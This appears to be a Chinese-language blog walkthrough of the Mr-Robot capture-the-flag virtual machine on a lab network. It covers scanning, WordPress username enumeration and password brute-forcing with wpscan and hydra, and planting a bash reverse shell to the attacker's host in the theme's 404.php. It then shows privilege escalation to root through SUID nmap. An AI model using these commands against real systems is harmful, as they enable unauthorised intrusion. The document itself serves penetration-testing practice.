首页 > 其他分享 >MR-ROBOT渗透思路

MR-ROBOT渗透思路

时间:2023-05-11 14:34:09浏览次数:45  
标签:查看 密码 渗透 扫描 ROBOT 漏洞 MR 10.10 10.141

实验环境

靶机下载地址
kali:10.10.10.128
靶机:10.10.10.141

基础知识点

  1. WordPress是一款开源的、基于PHP和MYSQL的博客和内容管理系统(CMS)。
  2. WPScan是一个专门用于扫描WordPress安全漏洞的自动化工具。它支持多种扫描,例如排除漏洞扫描、密码破解和主题、插件扫描等。
    3。 Nikto是一个开源的Web服务器扫描工具,可以检测Web服务器上的各种漏洞和弱点。它能够对目标服务器进行全面的安全测试,包括启用的服务、已知的漏洞和配置错误等。 Nikto可以使用不同的技术来检测漏洞,包括常见的指纹检测和漏洞扫描,以及高级的Web应用程序漏洞检查,例如XSS和SQL注入。
  3. robots.txt是一种文本文件,用于向网络爬虫指示那些页面需要被抓取或忽略。robots.txt文件必须放置在网站的根目录下。它可能泄露一些敏感目录。

渗透流程

1. 发现主机

netdiscover -i eth0 -r 10.10.10.0/24

img

arp-scan 10.10.10.0/24

img

2. 服务发现

nmap -sS -sV -p- 10.10.10.141

img

3. 目录扫描
先对目标网站进行简单的浏览,看看有没有什么"好东西"。
img
非常酷炫!!!
使用各个目录扫描工具扫描一波
御剑:
img

dirsearch:

dirsearch -u http:10.10.10.141 -w

img

注意点:在实战环境中尽量使用多款目录扫描器,如dirb、dirbuster、gobuster等等,主要是一些目录爆破工具字典的差异性,而导致得到的结果有所不同。

浏览扫描出来的目录,查看有没有什么敏感的信息。
查看robot.txt文件:
img
有两个文件:
其中key-1-of-3.txt就是第一个flag。
img
通过查看下载下来的fsocity.dic文件,猜想一个和登录有关的。(暂时放放)
继续访问wp-admin:
img
看到该页面,本来先进行弱密码破解,但是手中的信息很少,就先放放吧!!!,在该页面下有一个忘记密码,先点进去看看。
img
发现是一个找回密码的功能,顺便输入几个用户,发现提示无效用户或者邮箱。那说明可以进行用户名破解,猜想先把账号破解出来,再破解登录密码。那上面那个fsocity.dic就有用了。
img
通过burpsuite破解出来账号了(由于文件太大,没有等它完全爆破完,在实战中不能这样,要有一点耐心!!!)。这里爆出账号,ELLIOT、elliot
整理一下目前收集到的信息:
账号:ELLIOT、elloit
CMS:WordPress
现在可以说捉襟见肘,诸位军师有何妙计,助我!!!有了,我灵机一动,不是有账号了嘛。只差密码了?那爆破一下?额。。。不行,这个留着最后用。
那先漏洞扫描一下呗,掏出我的大宝贝:AWVS扫一扫
img
哦哦,还玩个鸡毛啊!!!我不服,我不服,使用一下开源神器:web漏洞扫描开源神器nikto

nikto -h 10.10.10.141

还是没有扫描出来扫描可以利用的漏洞。上面信息收集到的CMS不是WordPress,那使用wpscan扫一下外加暴力破解:

wpscan --url http://10.10.10.141 -U ELLIOT -P
/root/Desktop/fsocity.dic

img
经过两个小时的尝试终于搞出来了,服了!!!

账号:elliot(经过登录尝试,不区分大小写)
密码:ER28-0652
img

既然拿到后台登录权限,接下来就是get shell,还是老思路,看看有没有文件上传或者可以写木马文件。
img
在404.php中写入:

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/5555 0>&1'");

在kali中:

nc -lvnp 5555

img
查看用户权限,发现是低权限用户,切换到/home目录,发现两个文件,其中key-2-of-3.txt没有权限访问,访问password-raw-md5是一串MD5加密的robot
密码。
img
使用https://www.somd5.com/破解该MD5:
img
robot的密码为:abcdefghijklmnopqrstuvwxyz
切换robot用户:
img
发现不能直接在当前环境下切换用户,那就使用python反弹shell

python -c "import pty;pty.spawn('/bin/sh')"

img
成功得到了第二个flag,还是一样的操作,查看用户权限,提权。首先查看SUID,看能不能进行提取。

find / -perm -4000 2>/dev/null
或者
find / -perm -u=s -type f 2>/dev/null

img
在这里觉得/usr/local/bin/nmap有点不正常,查看查看,在kali上使用man nmap对比一下,发现没有"--interactive"选项,那就再查看查看它是搞什么的。
img

img
提取成功,是root用户,查看flag3完成!!!
img

拓展:

  1. 使用hydra爆破表单
hydra -l <username> -P <password_list_file> <target_url> http-post-form=<login_form_action_url>:<login_form_parameters>:<login_response_keyword>

其中-l参数用于指定单个用户名,-P参数用于指定密码列表文件的路径,http-post-form参数用于指定POST请求所需的参数,其中包括登录表单的Action URL、登录表示的Params和登录成功的关键字。
在上面爆破账号也可以使用hydra进行爆破:

hydra -L /root/Destop/fsocity.dic -p kks 10.10.10.141 http-post-form "/wp-login.php:log=^User^&pwd=^PASS^&wp-submit=Log+Ln:F=Inalid username"
  1. kali系统中自带shell脚本,可以直接使用
    路径:/usr/share/webshells/php

总结:
1. 自己很菜!!!
2. 人生需要多一点耐心!!!
3. 练习再练习!!!

标签:查看,密码,渗透,扫描,ROBOT,漏洞,MR,10.10,10.141
From: https://www.cnblogs.com/kalixcn/p/17390922.html

相关文章

  • 永磁同步电机的控制算法仿真模型: 1. 永磁同步电机的MRAS无传感器矢量
    永磁同步电机的控制算法仿真模型:1.永磁同步电机的MRAS无传感器矢量控制:2.永磁同步电机的SMO无传感器矢量控制(反正切+锁相环);3.永磁同步电机DTC直接转矩控制;4.永磁同步电机的有传感器矢量控制;5.永磁同步电机的位置控制YID:92128687292912454......
  • Three_Phase_SPWMRectifier:基于MATLAB/Simulink的三相电压型开环SPWM整流器仿真模型。
    Three_Phase_SPWMRectifier:基于MATLAB/Simulink的三相电压型开环SPWM整流器仿真模型。仿真条件:MATLAB/SimulinkR2015b,如需转成低版本格式请提前告知ID:5215649229233422......
  • 论文阅读笔记《Training Socially Engaging Robots Modeling Backchannel Behaviors w
    TrainingSociallyEngagingRobotsModelingBackchannelBehaviorswithBatchReinforcementLearning训练社交机器人:使用批量强化学习对反馈信号行为进行建模发表于TAC2022。HussainN,ErzinE,SezginTM,etal.TrainingSociallyEngagingRobots:ModelingBackc......
  • Qt XML读写之 QXmlStreamReader、QXmlStreamWriter
    OverviewQtXML将不再接收额外的功能。对于迭代地读取或编写XML文档(SAX),Qt建议使用QtCore的QXmlStreamReader和QXmlStreamWriter类。这些类既易于使用,又更符合XML标准。但是遗憾的是如果想修改更新XML文档,这个模块没有提供解决方案,还只能使用QDomDocument。QXmlStreamReader类......
  • Morpheus渗透实例
    靶机下载地址渗透流程1.主机发现netdiscover-ieth0-r10.10.10.0/242.对主机进行服务探测nmap-sS-sV-p-10.10.10.1383.进行目标系统简单的访问浏览源代码,没有发现什么有用的信息。4.对目标系统进行目录扫描注意点:使用不同的目录扫描器,扫出的信息更多更......
  • 《asyncio 系列》8. 在 asyncio 中通过流(StreamReader、StreamWriter)来实现 TCP 请求
    楔子在编写网络应用程序时,我们使用了socket库来读取和写入客户端。虽然在构建低级网络库时直接使用套接字很有效,但用法上还是有些复杂,例如启动服务端、等待客户端连接以及向客户端发送数据等等。asyncio的设计者意识到这一点,并构建了网络流API,这些更高级的API比套接字更容......
  • 近源渗透学习
    一、近源渗透近源渗透测试是网络空间安全领域逐渐兴起的一种新的安全评估手段。它是一种集常规网络攻防、物理接近、社会工程学及无线电通信攻防等能力于一体的高规格网络安全评估行动。网络安全评估小组在签订渗透测试授权协议后,通过乔装、社工等方式实地物理侵入企业办公区域,......
  • Narak -- tftp、dav和motd渗透
    主机发现sudonmap-sT--min-rate10000-p-xx.xx.xx.xx-oAnmapscan/portssudonmap-sT-sV-sC-O-p22,80xx.xx.xx.xx-oAnmapscan/detailsudonmap-sU--top-ports20xx.xx.xx.xx-oAnmapscan/udp发现了一个tftp,能够进行渗透sudonmap--script=vuln-p22,8......
  • 2023-05-06:X轴上有一些机器人和工厂。给你一个整数数组robot,其中robot[i]是第i个机器
    2023-05-06:X轴上有一些机器人和工厂。给你一个整数数组robot,其中robot[i]是第i个机器人的位置再给你一个二维整数数组factory,其中factory[j]=[positionj,limitj]表示第j个工厂的位置在positionj,且第j个工厂最多可以修理limitj个机器人每个机器人所在的位置互不相......
  • WEB|[MRCTF2020]套娃
    查看网页源码发现代码$query=$_SERVER['QUERY_STRING'];if(substr_count($query,'_')!==0||substr_count($query,'%5f')!=0){die('Y0uareSocutE!');}if($_GET['b_u_p_t']!=='23333'&&am......